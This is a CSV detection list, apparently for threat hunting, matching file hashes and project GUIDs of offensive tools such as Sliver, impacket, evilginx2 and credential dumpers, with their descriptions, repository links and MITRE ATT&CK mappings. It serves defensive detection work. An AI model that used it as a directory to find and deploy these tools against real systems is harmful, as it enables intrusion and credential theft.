"*1B52A3D9-014C-4CBF-BB98-09080D9A8D16*",".{0,1000}1B52A3D9\-014C\-4CBF\-BB98\-09080D9A8D16.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","22678"
"*1b578e26adc91f95143cb5c8dcfa9c0baf76923ea2295cc45e2e7a99bd4a763c*",".{0,1000}1b578e26adc91f95143cb5c8dcfa9c0baf76923ea2295cc45e2e7a99bd4a763c.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","0","#filehash","N/A","10","2","123","22","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z","22679"
"*1b591c180e6c5221a81921e42b0256b62cec1f1af872624f5fd178d1ed7bd7c6*",".{0,1000}1b591c180e6c5221a81921e42b0256b62cec1f1af872624f5fd178d1ed7bd7c6.{0,1000}","offensive_tool_keyword","dumper2020","Create a minidump of the LSASS process - attempts to neutralize all user-land API hooks before dumping LSASS","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gitjdm/dumper2020","1","0","#filehash","N/A","10","1","76","5","2020-12-29T03:55:21Z","2020-10-04T17:25:21Z","22680"
"*1b5b1dcea5728489f0373d6f8f351d69912498c61829ceccf5c5d0233bf0c852*",".{0,1000}1b5b1dcea5728489f0373d6f8f351d69912498c61829ceccf5c5d0233bf0c852.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","22681"
"*1b609698b6ff63a7b10bc9b656a698ce57b1995ee1f8894673d4e58e16e2a93c*",".{0,1000}1b609698b6ff63a7b10bc9b656a698ce57b1995ee1f8894673d4e58e16e2a93c.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","22682"
"*1b64535871ba5902d04a803aa1e9f746753e42258c104e81a563a4d6bb10ebf7*",".{0,1000}1b64535871ba5902d04a803aa1e9f746753e42258c104e81a563a4d6bb10ebf7.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","22684"
"*1b663d586331064566b0896ba3c2d7079a4c4b6b9a4473b634e76655bc36f599*",".{0,1000}1b663d586331064566b0896ba3c2d7079a4c4b6b9a4473b634e76655bc36f599.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","22685"
"*1b6d6a1a116e8ddaeb7e3dde5dfc285e50004be80e977aa612447275c5930281*",".{0,1000}1b6d6a1a116e8ddaeb7e3dde5dfc285e50004be80e977aa612447275c5930281.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","0","#filehash","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","22687"
"*1b789e0e641506e259b2e4e2a64dac2654f224dcaf4d57da0634ce4774eb9b90*",".{0,1000}1b789e0e641506e259b2e4e2a64dac2654f224dcaf4d57da0634ce4774eb9b90.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","22689"
"*1b7ba7d421c730e4f9ab9f954f591dd61899fc06badf9cac8ed821d04e492973*",".{0,1000}1b7ba7d421c730e4f9ab9f954f591dd61899fc06badf9cac8ed821d04e492973.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","22690"
"*1b80f6a088f3bfc7f72208fc3ef8a4471e37cc59f4d13c863deac34b51f8692a*",".{0,1000}1b80f6a088f3bfc7f72208fc3ef8a4471e37cc59f4d13c863deac34b51f8692a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22691"
"*1B826591784D6FBFB1BED96065D7EBD9982723D3EEC2386614088AAA4CA84F0D*",".{0,1000}1B826591784D6FBFB1BED96065D7EBD9982723D3EEC2386614088AAA4CA84F0D.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","22692"
"*1b87e3a566e015aa71409428ad95cc231860e85bb64396197bb3b511021a7c45*",".{0,1000}1b87e3a566e015aa71409428ad95cc231860e85bb64396197bb3b511021a7c45.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","22693"
"*1b8ca67716c0928b6e8f6325dc89affc9c312353dfcaea788618c8b50337c857*",".{0,1000}1b8ca67716c0928b6e8f6325dc89affc9c312353dfcaea788618c8b50337c857.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","22695"
"*1b91671f55675c1262fa008c5a6f24f7842cb7f14bcf30aed99444d8ea5fed5f*",".{0,1000}1b91671f55675c1262fa008c5a6f24f7842cb7f14bcf30aed99444d8ea5fed5f.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","22696"
"*1b9b3211b26dcb730d47fa8e7bd97a2c3d5bc4b740a1c6c15fb690c87cd12031*",".{0,1000}1b9b3211b26dcb730d47fa8e7bd97a2c3d5bc4b740a1c6c15fb690c87cd12031.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","22697"
"*1ba34d4d223d6a532c194e578a3efc5e8aeae8bf657223614c502e28d84942cf*",".{0,1000}1ba34d4d223d6a532c194e578a3efc5e8aeae8bf657223614c502e28d84942cf.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","22699"
"*1ba38ae7e6c55fd66b21d40178341d18c195991c23044e030c3096746a2e1266*",".{0,1000}1ba38ae7e6c55fd66b21d40178341d18c195991c23044e030c3096746a2e1266.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","22700"
"*1ba53ac62c21cd1f829f4d4cb0ee06906cd3bfd0cf78da267c3b7d9acfb6d27b*",".{0,1000}1ba53ac62c21cd1f829f4d4cb0ee06906cd3bfd0cf78da267c3b7d9acfb6d27b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22702"
"*1BA54A13-B390-47B3-9628-B58A2BBA193B*",".{0,1000}1BA54A13\-B390\-47B3\-9628\-B58A2BBA193B.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","22703"
"*1ba866ccd7462b3d78f20e76558f9b7ab94a3f565ed6261c60078de511dfc461*",".{0,1000}1ba866ccd7462b3d78f20e76558f9b7ab94a3f565ed6261c60078de511dfc461.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","22704"
"*1baa69530af844b454f505e1c21c1459d532efa7a0369cc78296121841355510*",".{0,1000}1baa69530af844b454f505e1c21c1459d532efa7a0369cc78296121841355510.{0,1000}","offensive_tool_keyword","Argus","Information Gathering Toolkit","T1590.001 - T1590.002 - T1595.003 - T1016 - T1046 - T1590.005","TA0043 - TA0007","N/A","N/A","Reconnaissance","https://github.com/jasonxtn/Argus","1","0","#filehash","N/A","4","10","1951","210","2024-10-08T19:04:27Z","2024-10-01T22:13:51Z","22705"
"*1BACEDDC-CD87-41DC-948C-1C12F960BECB*",".{0,1000}1BACEDDC\-CD87\-41DC\-948C\-1C12F960BECB.{0,1000}","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tool","https://github.com/gabe-k/themebleed","1","0","#GUIDproject","N/A","10","2","196","37","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z","22706"
"*1bb41d5d6d3c883be23682ec1d94ee3317c0ab8d5fa2bee3712a5f33c0d6960b*",".{0,1000}1bb41d5d6d3c883be23682ec1d94ee3317c0ab8d5fa2bee3712a5f33c0d6960b.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003  - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","#filehash","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","22707"
"*1bc3fc0ecdae8f404c33942914e6f442ea91400bdea77322b318ab576d4050a9*",".{0,1000}1bc3fc0ecdae8f404c33942914e6f442ea91400bdea77322b318ab576d4050a9.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","#filehash","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","22708"
"*1bc73a13029b5677f070a991cec0ed90f3ebd70bcc0566a4724496eb71792dee*",".{0,1000}1bc73a13029b5677f070a991cec0ed90f3ebd70bcc0566a4724496eb71792dee.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","#filehash","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","22709"
"*1bc86ec82025ba921af42a51e67f9e273a9a9628778477ad7e28b86f8b3326fb*",".{0,1000}1bc86ec82025ba921af42a51e67f9e273a9a9628778477ad7e28b86f8b3326fb.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22710"
"*1bc8fca2c5b410f9c0bbfff18af3dc6295f2a8b8d7c2ba953e282b6a0bc6214c*",".{0,1000}1bc8fca2c5b410f9c0bbfff18af3dc6295f2a8b8d7c2ba953e282b6a0bc6214c.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","22711"
"*1bd59761e0390b6dee196b67f5cfd3b0dae73cdb5905815cd4ae9d5ae02293f7*",".{0,1000}1bd59761e0390b6dee196b67f5cfd3b0dae73cdb5905815cd4ae9d5ae02293f7.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","22714"
"*1be348a72f9fc11fe85f58866d0deeaf3798b300130493da6907f9d1213a9328*",".{0,1000}1be348a72f9fc11fe85f58866d0deeaf3798b300130493da6907f9d1213a9328.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","22715"
"*1be8d887faf0e80185a811e2c3a734117dcd081136d088295356bb5ddc6395be*",".{0,1000}1be8d887faf0e80185a811e2c3a734117dcd081136d088295356bb5ddc6395be.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","22716"
"*1be9af3e46ecda17aed9e3c5c563003b5f1fd31b9833fd85e69e11fb53a6bc4d*",".{0,1000}1be9af3e46ecda17aed9e3c5c563003b5f1fd31b9833fd85e69e11fb53a6bc4d.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","#filehash","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","22717"
"*1bf68c433eb8684cda13f16146339666983a0b413243a6708e33dce298bdc23f*",".{0,1000}1bf68c433eb8684cda13f16146339666983a0b413243a6708e33dce298bdc23f.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","#filehash","N/A","10","9","N/A","N/A","N/A","N/A","22719"
"*1bf703bef8ee1927c28ba6691843bf7576dc9f7e3af6c2efdb653695e7163daf*",".{0,1000}1bf703bef8ee1927c28ba6691843bf7576dc9f7e3af6c2efdb653695e7163daf.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","22720"
"*1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E*",".{0,1000}1BF9C10F\-6F89\-4520\-9D2E\-AAF17D17BA5E.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","#GUIDproject","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","22721"
"*1bff5a9cb5275afd7b7d4bf2d3087f1b3bf94864c4decf73f1c82922ad646d2f*",".{0,1000}1bff5a9cb5275afd7b7d4bf2d3087f1b3bf94864c4decf73f1c82922ad646d2f.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","22723"
"*1c008a8214c1fa6b06500d92a76900314b9f889818d6dae55f274f3a95d874b6*",".{0,1000}1c008a8214c1fa6b06500d92a76900314b9f889818d6dae55f274f3a95d874b6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22724"
"*1c00f46dec53547c1aa2faace16e027cd276d5c6ab53abe79e4379d81b09826b*",".{0,1000}1c00f46dec53547c1aa2faace16e027cd276d5c6ab53abe79e4379d81b09826b.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","22725"
"*1c0a207ce57e860adae1f3c0d7a0cd5c1312467950ada3216ea22b4dca5d42bb*",".{0,1000}1c0a207ce57e860adae1f3c0d7a0cd5c1312467950ada3216ea22b4dca5d42bb.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22728"
"*1c0f922ca54295ab3f496fded2eada45fa166e32b34bdefc838ba3919c679208*",".{0,1000}1c0f922ca54295ab3f496fded2eada45fa166e32b34bdefc838ba3919c679208.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","22729"
"*1c14d0d58efdd3244a1fd4398ef9c65e96bfe4faccc168e7ace84728da908d9e*",".{0,1000}1c14d0d58efdd3244a1fd4398ef9c65e96bfe4faccc168e7ace84728da908d9e.{0,1000}","offensive_tool_keyword","PrivFu","enable or disable specific token privileges for a process","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","SwitchPriv","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","22730"
"*1c267e901a65d142bf532bc0d26926dd9ceaa43e16b48df37c0739ba050a1c50*",".{0,1000}1c267e901a65d142bf532bc0d26926dd9ceaa43e16b48df37c0739ba050a1c50.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","22731"
"*1c28d23e9c40b7f247de4c2b2976e69a644c901bf2afa5c78366a11de9fe090e*",".{0,1000}1c28d23e9c40b7f247de4c2b2976e69a644c901bf2afa5c78366a11de9fe090e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22733"
"*1c291548b59d3af8b3c225cb7e019b86a3cb706eec437b275528699898bcdb3a*",".{0,1000}1c291548b59d3af8b3c225cb7e019b86a3cb706eec437b275528699898bcdb3a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22734"
"*1c309b473a4221fa7bbb5566935f888a7d8cf523ea33c6f7b568c7342f81419a*",".{0,1000}1c309b473a4221fa7bbb5566935f888a7d8cf523ea33c6f7b568c7342f81419a.{0,1000}","offensive_tool_keyword","SharpWeb","SharpWeb - to export browser data including passwords - history - cookies - bookmarks and download records","T1555.003 - T1539 - T1602 - T1074.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/StarfireLab/SharpWeb","1","0","#filehash","N/A","10","8","703","79","2024-11-15T07:05:34Z","2023-10-09T06:48:23Z","22736"
"*1c433a8035d4dba34f796841bdd25045167a59c41c716548b00a7439146a48a5*",".{0,1000}1c433a8035d4dba34f796841bdd25045167a59c41c716548b00a7439146a48a5.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22738"
"*1c4b5a0c298af06402c2aec4c90a3b9a3e0fe79067fcbb8ea13f261e9f3b5405*",".{0,1000}1c4b5a0c298af06402c2aec4c90a3b9a3e0fe79067fcbb8ea13f261e9f3b5405.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22739"
"*1c4fd2d2f860350700465103ebe246d2e50c1090d9e12872e4418cac765cae20*",".{0,1000}1c4fd2d2f860350700465103ebe246d2e50c1090d9e12872e4418cac765cae20.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22741"
"*1c50adeb-53ac-41b9-9c34-7045cffbae45*",".{0,1000}1c50adeb\-53ac\-41b9\-9c34\-7045cffbae45.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tool","https://github.com/gremwell/o365enum","1","0","#GUIDproject","N/A","7","3","267","39","2024-05-02T07:45:31Z","2020-02-18T12:22:50Z","22742"
